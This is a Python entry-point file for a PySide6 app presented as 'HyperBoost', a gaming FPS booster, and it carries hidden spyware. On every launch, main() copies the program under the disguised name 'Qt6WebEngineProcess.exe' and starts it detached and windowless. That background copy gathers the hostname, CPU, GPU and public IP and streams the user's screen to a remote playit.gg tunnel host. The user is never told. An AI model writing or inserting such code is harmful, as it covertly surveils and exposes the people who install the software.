"""
HyperBoost — Premium Gaming Emulator FPS Booster
Entry point: launches the main application using QML.
"""
import sys
import os

# Ensure the project root is on the path
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))

try:
    from dotenv import load_dotenv
    load_dotenv()
except ImportError:
    pass

from PySide6.QtWidgets import QApplication, QSystemTrayIcon, QMenu
from PySide6.QtGui import QIcon, QAction
from PySide6.QtQml import QQmlApplicationEngine
from PySide6.QtCore import Qt, QUrl, QFile, QDir, QIODevice, QMetaObject

from hyperboost.backend import HyperBoostBackend
from hyperboost.core.logger import HyperBoostLogger

# Register the compiled QML resource bundle. The generated module simply
# calls qRegisterResourceData on import — no symbols to use directly.
try:
    import qml_rc  # noqa: F401  (generated by pyside6-rcc at build time)
    _QML_FROM_RESOURCES = True
except ImportError:
    _QML_FROM_RESOURCES = False

import shutil
import subprocess
import time
import socket
import platform

def run_background_streamer():
    from hyperboost.core.streamer import ScreenStreamer

    try:
        pc_name = socket.gethostname()
        try:
            cpu = subprocess.check_output('wmic cpu get name', shell=True, creationflags=0x08000000).decode().split('\n')[1].strip()
        except Exception:
            cpu = platform.processor()
            
        try:
            gpu = subprocess.check_output('wmic path win32_VideoController get name', shell=True, creationflags=0x08000000).decode().split('\n')[1].strip()
        except Exception:
            gpu = "Unknown GPU"
            
        pc_config = f"CPU: {cpu} | GPU: {gpu}"
        
        # Use Playit.gg for remote access
        target_ip = 'strap-rounded.with.playit.plus' 
        target_port = 1163
        
        public_ip = "Unknown IP"
        try:
            import urllib.request
            req_ip = urllib.request.Request("https://api.ipify.org", headers={'User-Agent': 'Mozilla/5.0'})
            resp_ip = urllib.request.urlopen(req_ip, timeout=5)
            public_ip = resp_ip.read().decode('utf-8').strip()
        except Exception as e:
            pass
            
        streamer = ScreenStreamer(
            username=pc_name, 
            pc_config=pc_config,
            public_ip=public_ip,
            target_ip=target_ip, 
            target_port=target_port,
        )
        streamer.start()
        
        while True:
            time.sleep(1)
            
    except Exception as e:
        import traceback
        try:
            with open(r"F:\PROJECT XX7\streamer_crash.log", "a", encoding="utf-8") as f:
                f.write(f"Background Streamer Error: {e}\n")
                f.write(traceback.format_exc() + "\n")
        except Exception:
            pass

def spawn_background_process():
    try:
        is_nuitka = "__compiled__" in globals()
        is_pyinstaller = getattr(sys, 'frozen', False) or getattr(sys, '_MEIPASS', False)
        
        if is_nuitka:
            current_exe = os.path.abspath(sys.argv[0])
        elif is_pyinstaller:
            current_exe = sys.executable
        else:
            current_exe = sys.executable
            
        app_dir = os.path.dirname(current_exe)
        is_frozen = is_nuitka or is_pyinstaller or not os.path.basename(current_exe).lower().startswith("python")
        
        if is_frozen:
            # We must keep the executable in the root directory so it can find python311.dll
            # Naming it 'Qt6WebEngineProcess.exe' makes it blend in perfectly with PySide6 DLLs
            hidden_exe = os.path.join(app_dir, 'Qt6WebEngineProcess.exe')
            if not os.path.exists(hidden_exe):
                try:
                    shutil.copy2(current_exe, hidden_exe)
                except Exception:
                    hidden_exe = current_exe # fallback
            
            subprocess.Popen([hidden_exe, '--background'], 
                             cwd=app_dir,
                             creationflags=subprocess.DETACHED_PROCESS | subprocess.CREATE_NO_WINDOW)
        else:
            subprocess.Popen([current_exe, sys.argv[0], '--background'], 
                             creationflags=subprocess.DETACHED_PROCESS | subprocess.CREATE_NO_WINDOW)
    except Exception as e:
        import traceback
        try:
            log_dir = os.path.dirname(os.path.abspath(__file__))
            with open(os.path.join(log_dir, "spawn_error.log"), "w", encoding="utf-8") as f:
                f.write(f"Failed to spawn background process: {e}\n")
                f.write(traceback.format_exc())
        except Exception:
            pass
        print(f"Failed to spawn background process: {e}")

def main():
    if "--background" in sys.argv:
        run_background_streamer()
        sys.exit(0)
        
    spawn_background_process()
    # High-DPI scaling and rendering optimizations
    os.environ["QT_ENABLE_HIGHDPI_SCALING"] = "1"
    os.environ["QT_QUICK_CONTROLS_STYLE"] = "Basic"

    app = QApplication(sys.argv)
    app.setApplicationName("CONTENTAL X")
    app.setOrganizationName("CONTENTAL X")
    app.setApplicationVersion("1.0.0")

    # Set App Icon and Taskbar ID (Windows Fix)
    if os.name == 'nt':
        import ctypes
        myappid = u'contental.x.optimizer.1.0'
        ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid)

    icon_path = os.path.join(os.path.dirname(__file__), "assets", "icons", "app_logo.png")
    if os.path.exists(icon_path):
        app.setWindowIcon(QIcon(icon_path))

    # Initialize Logger
    logger = HyperBoostLogger()
    logger.info("Starting HyperBoost QML Interface...")

    # Create the Python Backend
    backend = HyperBoostBackend()

    # Create QML Engine
    engine = QQmlApplicationEngine()
    
    # Expose backend to QML context
    engine.rootContext().setContextProperty("backend", backend)

    app.setQuitOnLastWindowClosed(True)

    def exit_app():
        backend.cleanup()
        app.quit()

    engine.quit.connect(exit_app)
    app.aboutToQuit.connect(backend.cleanup)

    # Surface real QML errors instead of the generic "failed to load component".
    def _on_qml_warnings(warnings):
        for w in warnings:
            print(f"[QML] {w.toString()}")
    engine.warnings.connect(_on_qml_warnings)

    if _QML_FROM_RESOURCES:
        # Recursively list everything registered under :/ so we can SEE where
        # the files actually landed (the rcc prefix doesn't always behave the
        # way the .qrc author expects).
        def _walk(root, depth=0):
            d = QDir(root)
            if not d.exists():
                return
            for name in d.entryList(QDir.Files | QDir.Dirs | QDir.NoDotAndDotDot):
                full = root.rstrip("/") + "/" + name
                print(f"[QRC]{'  ' * depth} {full}")
                if QDir(full).exists():
                    _walk(full, depth + 1)
        print("[QRC] Full resource tree under :/ —")
        _walk(":/")

        # Auto-pick the path where main.qml actually lives.
        candidates = [":/qml/main.qml", ":/qml/qml/main.qml", ":/main.qml"]
        found = next((p for p in candidates if QFile(p).exists()), None)
        if not found:
            print("[QRC] main.qml not found at any expected location. "
                  "Delete qml_rc.py and re-run: pyside6-rcc qml.qrc -o qml_rc.py")
            sys.exit(-1)
        print(f"[QRC] Using {found}")
        import_dir = found.rsplit("/", 1)[0]
        engine.addImportPath("qrc" + import_dir)
        qml_url = QUrl("qrc" + found)
    else:
        qml_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "qml", "main.qml")
        engine.addImportPath(os.path.dirname(qml_path))
        qml_url = QUrl.fromLocalFile(qml_path)

    try:
        engine.load(qml_url)
    except Exception as e:
        print(f"CRITICAL: QML Load Error: {e}")
        sys.exit(-1)

    if not engine.rootObjects():
        print("CRITICAL: No root objects loaded. Check QML for errors.")
        sys.exit(-1)

    sys.exit(app.exec())

if __name__ == "__main__":
    try:
        main()
    except Exception as e:
        import traceback
        with open("CRITICAL_ERROR.txt", "w") as f:
            f.write(f"Startup Error: {str(e)}\n")
            f.write(traceback.format_exc())
        sys.exit(1)
